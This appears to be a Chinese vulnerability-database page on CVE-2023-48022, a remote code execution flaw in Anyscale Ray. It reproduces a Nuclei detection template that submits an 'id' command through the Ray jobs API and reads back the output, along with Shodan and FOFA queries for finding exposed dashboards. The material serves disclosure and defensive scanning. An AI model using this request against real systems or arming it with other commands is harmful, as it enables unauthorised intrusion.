CVE-2023-48022: Anyscale Ray - Remote Code Execution

日期: 2025-08-01 | 影响软件: Anyscale Ray | POC: 已公开

漏洞描述

Anyscale Ray 2.6.3 and 2.8.0 contain a remote code execution vulnerability due to insecure job submission API, allowing attackers to execute arbitrary code remotely if they have network access to the Ray Dashboard API.

PoC代码[已公开]

id: CVE-2023-48022

info:
  name: Anyscale Ray - Remote Code Execution
  author: riteshs4hu
  severity: critical
  description: |
    Anyscale Ray 2.6.3 and 2.8.0 contain a remote code execution vulnerability due to insecure job submission API, allowing attackers to execute arbitrary code remotely if they have network access to the Ray Dashboard API.
  reference:
    - https://bishopfox.com/blog/ray-versions-2-6-3-2-8-0
    - https://vulncheck.com/xdb/497d7fb3b118
    - https://github.com/jakabakos/ShadowRay-RCE-PoC-CVE-2023-48022
    - https://vulncheck.com/xdb/d3bafad9c9f6
    - https://github.com/0x656565/CVE-2023-48022
    - https://nvd.nist.gov/vuln/detail/cve-2023-48022
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-48022
    cwe-id: CWE-78
    epss-score: 0.9193
    epss-percentile: 0.99686
  metadata:
    verified: true
    max-request: 3
    vendor: ray_project
    product: ray
    shodan-query:
      - http.favicon.hash:463802404
      - http.html:"ray dashboard"
    fofa-query:
      - icon_hash=463802404
      - body="ray dashboard"
  tags: cve,cve2023,rce,ray,anyscale,vkev

variables:
  jobid: "Job_{{rand_base(6)}}"

http:
  - raw:
      - |
        POST /api/jobs/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "entrypoint": "id",
          "submission_id": "{{jobid}}"
        }

      - | # wait for 8 seconds before getting the logs
        GET / HTTP/1.1
        Host: {{Hostname}}

        {{wait_for(8)}}

      - |
        GET /api/jobs/{{jobid}}/logs HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "logs\":")'
          - 'contains(content_type, "application/json")'
          - 'regex("uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)", body)'
        condition: and
# digest: 4a0a00473045022100c603a11079689fb2dc38e4ac0caca7cd5b1d6bd3188a0cdf57127d07dda8f32b022074146a540f4550900a8860b2682faeb3adfa5d8ce381fddb94fc813fef3a070a:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-48022.yaml

相关漏洞推荐